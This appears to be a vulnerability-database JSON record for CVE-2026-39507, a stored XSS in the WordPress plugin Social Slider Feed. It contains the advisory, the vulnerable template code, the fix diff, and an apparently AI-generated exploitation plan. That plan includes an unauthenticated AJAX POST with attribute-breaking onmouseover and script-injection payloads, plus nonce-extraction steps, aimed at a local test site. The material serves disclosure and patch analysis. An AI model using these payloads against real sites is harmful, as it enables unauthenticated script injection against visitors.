[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$foYKthTPi5iUTuCb08hffTNORe6IJ0KIGGT74IxF-v2g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-39507","social-slider-feed-unauthenticated-stored-cross-site-scripting","Social Slider Feed \u003C= 2.3.2 - Unauthenticated Stored Cross-Site Scripting","The Social Slider Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","instagram-slider-widget",null,"\u003C=2.3.2","2.3.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-16 00:00:00","2026-04-21 14:59:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5bd6d250-b1c2-4c14-906d-6507ce39520f?source=api-prod",6,[22,23,24,25,26,27,28,29],"CHANGELOG.md","components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Ffeed_header.php","components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fhighlight.php","components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fmasonry.php","components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fremodal.php","components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fshowcase.php","components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fshowcase_remodal1.php","components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fslick.php","researched",false,3,"This research plan focuses on exploiting an unauthenticated stored cross-site scripting (XSS) vulnerability in the **Social Slider Feed** plugin (version \u003C= 2.3.2). The vulnerability resides in the way plugin settings and Instagram post data are handled and rendered in template files, specifically `showcase.php`.\n\n### 1. Vulnerability Summary\nThe plugin fails to adequately sanitize and escape user-controlled settings and Instagram feed data before outputting them into HTML attributes. In the `showcase.php` template, variables like `shopifeed_phone`, `shopifeed_color`, and post `caption` are echoed into data attributes or inline styles. An unauthenticated attacker can use an AJAX endpoint (traditionally unprotected in this plugin) to modify these settings or inject malicious feed data, leading to persistent XSS that executes when any user views the feed.\n\n### 2. Attack Vector Analysis\n* **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Action**: `wis_save_settings` (inferred from plugin history) or `wis_add_account`.\n* **Payload Parameter**: `shopifeed_phone` or `shopifeed_color`.\n* **Authentication**: Unauthenticated (`wp_ajax_nopriv_` registration).\n* **Preconditions**: The `[instagram-feed]` shortcode must be present on a public page, and the `showcase` template must be active.\n\n### 3. Code Flow\n1. **Entry Point**: An unauthenticated user sends a POST request to `admin-ajax.php` with an action intended for settings updates.\n2. **Processing**: The plugin's AJAX handler (likely in `WIS_Feed` or a similar component) receives the input and updates the plugin's options in the database without checking for administrative capabilities.\n3. **Storage**: The malicious payload (e.g., `\">\u003Cscript>alert(1)\u003C\u002Fscript>`) is stored in the `wp_options` table.\n4. **Sink**: A visitor accesses a page containing the `[instagram-feed]` shortcode.\n5. **Rendering**: The plugin calls `components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fshowcase.php`.\n6. **Injection**:\n * Line 12: `$phone = str_replace( [ '+', '-', '(', ')', ' ' ], '', $args['shopifeed_phone'] );` (Does not strip quotes).\n * Line 34: `\u003Ca data-isw-phone=\"\u003C?= $phone ?>\" ...>`\n * The payload breaks out of the `data-isw-phone` attribute.\n\n### 4. Nonce Acquisition Strategy\nThe plugin frequently localizes a nonce for its AJAX operations.\n1. **Identify Shortcode**: The vulnerability is triggered by the `[instagram-feed]` shortcode.\n2. **Setup Page**: Create a page with the shortcode to ensure scripts are enqueued:\n `wp post create --post_type=page --post_title=\"Feed\" --post_status=publish --post_content='[instagram-feed type=\"showcase\"]'`\n3. **Extract Nonce**: Navigate to the page and use `browser_eval` to find the nonce in the localized object. The plugin historically uses `wis_ajax_object` or `wis_feed_data`.\n * Command: `browser_eval(\"window.wis_ajax_object?.nonce || window.wis_feed_data?.nonce\")`\n4. **Fallback**: If no nonce is found, the AJAX handler may be missing a `check_ajax_referer` call entirely, which is common in unauthenticated WordPress vulnerabilities.\n\n### 5. Exploitation Strategy\n**Step 1: Discover the AJAX Action**\nTry updating settings via `wis_save_settings`.\n* **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method**: POST\n* **Body**: `action=wis_save_settings&shopifeed_phone=\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:1000px;height:1000px;position:fixed;top:0;left:0;z-index:9999;` (This creates a full-screen transparent overlay that triggers on mouse move).\n\n**Step 2: Verify Storage**\nCheck if the setting was updated using WP-CLI:\n`wp option get wis_settings` (The option name might be `wis_instagram_slider_widget_settings`).\n\n**Step 3: Trigger XSS**\nNavigate to the page created in the Test Data Setup. The malicious `data-isw-phone` attribute will now contain the breakout payload.\n\n### 6. Test Data Setup\n1. **Activate Plugin**: Ensure `instagram-slider-widget` is active.\n2. **Create Target Page**:\n ```bash\n wp post create --post_type=page --post_title=\"Social Feed\" --post_status=publish --post_content='[instagram-feed type=\"showcase\"]'\n ```\n3. **Configure Showcase (Optional)**: If the AJAX action requires specific keys, ensure the `type` is set to `showcase` so the vulnerable template is loaded.\n\n### 7. Expected Results\n* The AJAX request should return a successful response (e.g., `1` or `{\"success\":true}`).\n* When visiting the target page, the HTML source for the `isw-wishlist-a` anchor tag should look like:\n `\u003Ca data-isw-phone=\"\" onmouseover=\"alert(document.domain)\" ...`\n* The browser should execute the `alert()` when the mouse moves over the page.\n\n### 8. Verification Steps\n1. **Check Options**:\n ```bash\n wp option get wis_instagram_slider_widget_settings\n ```\n Confirm the payload is present in the `shopifeed_phone` or `shopifeed_color` key.\n2. **Check Rendered HTML**: Use `http_request` to GET the page and grep for the payload:\n ```bash\n http_request \"http:\u002F\u002Flocalhost:8080\u002Fsocial-feed\u002F\" | grep \"onmouseover\"\n ```\n\n### 9. Alternative Approaches\nIf `shopifeed_phone` is sanitized more strictly than the code suggests, target **`shopifeed_color`**:\n* **Location**: `showcase.php` Line 44: `...style=\"...background-color: \u003C?= $color ?>\">`\n* **Payload**: `red; } \u003C\u002Fstyle>\u003Cscript>alert(1)\u003C\u002Fscript>\u003Cstyle> .dummy { color: blue`\n* **Mechanism**: This breaks out of the inline `style` attribute AND the CSS context to inject a script tag.\n\nIf `wis_save_settings` fails, search the plugin folder for `wp_ajax_nopriv` to find the exact action name:\n`grep -r \"wp_ajax_nopriv\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finstagram-slider-widget\u002F`","The Social Slider Feed plugin for WordPress is vulnerable to unauthenticated stored XSS due to the lack of sanitization and escaping on plugin settings and Instagram post data. This allows unauthenticated attackers to inject malicious scripts into fields like phone numbers or colors via AJAX, which execute whenever a user views a page containing the social feed shortcode.","\u002F* components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fshowcase.php *\u002F\n\n \u003Ca\n data-isw-phone=\"\u003C?= $phone ?>\"\n data-isw-color=\"\u003C?= $color ?>\"\n data-isw-wasvg=\"\u003C?= $whatsapp_svg ?>\"\n data-isw-mailsvg=\"\u003C?= $mail_svg ?>\"\n data-isw-email=\"\u003C?= $mail ?>\"\n class=\"isw-wishlist-a\" id=\"show-wishlist\" style=\"padding: 8px 15px !important;background-color: \u003C?= $color ?>\">\n\n---\n\n\u002F* components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fmasonry.php *\u002F\n\n\u003Cdiv class=\"wis-item\">\n \u003Cdiv class=\"wis-img\">\n\t \u003C?php if ($link_to == 'popup') {?>\n \u003Ca data-remodal-target=\"\u003C?= $id ?>\" class=\"wis-popup-a wis-masonry-a\">\n\t\t \u003C?php } else if($link_to == 'none') {?>\n\n---\n\n\u002F* components\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Ffeed_header.php *\u002F\n\n \u003Cdiv class=\"wis-header-info\">\n \u003Ca href=\"\u003C?= $profile_url ?>\" target=\"_blank\" style=\"text-decoration: none; color: black; border: 0 !important;\">\n \u003Cp class=\"wis-header-info-username\">\u003C?php echo esc_html($username) ?>\u003C\u002Fp>\n \u003C\u002Fa>","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Finstagram-slider-widget\u002F2.3.2\u002Fcomponents\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fshowcase.php\t2026-02-06 12:53:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Finstagram-slider-widget\u002F2.3.3\u002Fcomponents\u002Finstagram\u002Fhtml_templates\u002Ftemplates\u002Fshowcase.php\t2026-03-05 12:45:08.000000000 +0000\n@@ -28,23 +28,23 @@\n \u003Cdiv class=\"isw-showcase-wishlist-container\">\n \u003Cdiv class=\"isw-showcase-wishlist-block\">\n \u003Ca\n- data-isw-phone=\"\u003C?= $phone ?>\"\n- data-isw-color=\"\u003C?= $color ?>\"\n- data-isw-wasvg=\"\u003C?= $whatsapp_svg ?>\"\n- data-isw-mailsvg=\"\u003C?= $mail_svg ?>\"\n- data-isw-email=\"\u003C?= $mail ?>\"\n- class=\"isw-wishlist-a\" id=\"show-wishlist\" style=\"padding: 8px 15px !important;background-color: \u003C?= $color ?>\">\n+ data-isw-phone=\"\u003C?php echo esc_attr( $phone ); ?>\"\n+ data-isw-color=\"\u003C?php echo esc_attr( $color ); ?>\"\n+ data-isw-wasvg=\"\u003C?php echo esc_attr( $whatsapp_svg ); ?>\"\n+ data-isw-mailsvg=\"\u003C?php echo esc_attr( $mail_svg ); ?>\"\n+ data-isw-email=\"\u003C?php echo esc_attr( $mail ); ?>\"\n+ class=\"isw-wishlist-a\" id=\"show-wishlist\" style=\"padding: 8px 15px !important;background-color: \u003C?php echo esc_attr( $color ); ?>\">\n \u003Cspan class=\"dashicons dashicons-heart isw-heart\" style=\"color: white;\">\u003C\u002Fspan>\n \u003Cspan class=\"isw-wishlist-text\">\u003C?php esc_html_e( 'WISHLIST', 'instagram-slider-widget' ); ?>\u003C\u002Fspan>\n \u003C\u002Fa>\n \u003C\u002Fdiv>\n \u003C\u002Fdiv>\n \t\u003C?php foreach ( $posts as $post ): ?>\n- \u003Cdiv class=\"isw-showcase-item\" style=\"width: \u003C?= 85 \u002F $columns - 2.5 ?>%; height: \u003C?= 900 \u002F $columns + 150 * $columns \u002F 3 ?>px;\">\n+ \u003Cdiv class=\"isw-showcase-item\" style=\"width: \u003C?php echo esc_attr( 85 \u002F $columns - 2.5 ); ?>%; height: \u003C?php echo esc_attr( 900 \u002F $columns + 150 * $columns \u002F 3 ); ?>px;\">\n \u003Cdiv class=\"isw-showcase-item-image-container\">\n \n- \u003Ca data-remodal-target=\"\u003C?= $post['id'] ?>\">\n- \u003Cimg class=\"isw-showcase-item-image\" src=\"\u003C?= $post['image'] ?>\" alt=\"\u003C?= $post['caption'] ?>\">\n+ \u003Ca data-remodal-target=\"\u003C?php echo esc_attr( $post['id'] ); ?>\">\n+ \u003Cimg class=\"isw-showcase-item-image\" src=\"\u003C?php echo esc_url( $post['image'] ); ?>\" alt=\"\u003C?php echo esc_attr( $post['caption'] ); ?>\">","The exploit involves two main steps: 1) Injecting a payload into the plugin's settings via an unauthenticated AJAX request. An attacker can send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `wis_save_settings` (or similar depending on the exact setup) containing a malicious payload in parameters like `shopifeed_phone` (e.g., `\" onmouseover=\"alert(1)\"`). 2) Triggering the payload by visiting a page where the `[instagram-feed]` shortcode is rendered using the 'showcase' or 'masonry' templates. Because the plugin fails to escape these values before outputting them into HTML attributes, the script executes in the user's browser.","gemini-3-flash-preview","2026-04-27 14:29:11","2026-04-27 14:30:08",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finstagram-slider-widget\u002Ftags\u002F2.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finstagram-slider-widget.2.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finstagram-slider-widget\u002Ftags\u002F2.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finstagram-slider-widget.2.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finstagram-slider-widget\u002Ftags"]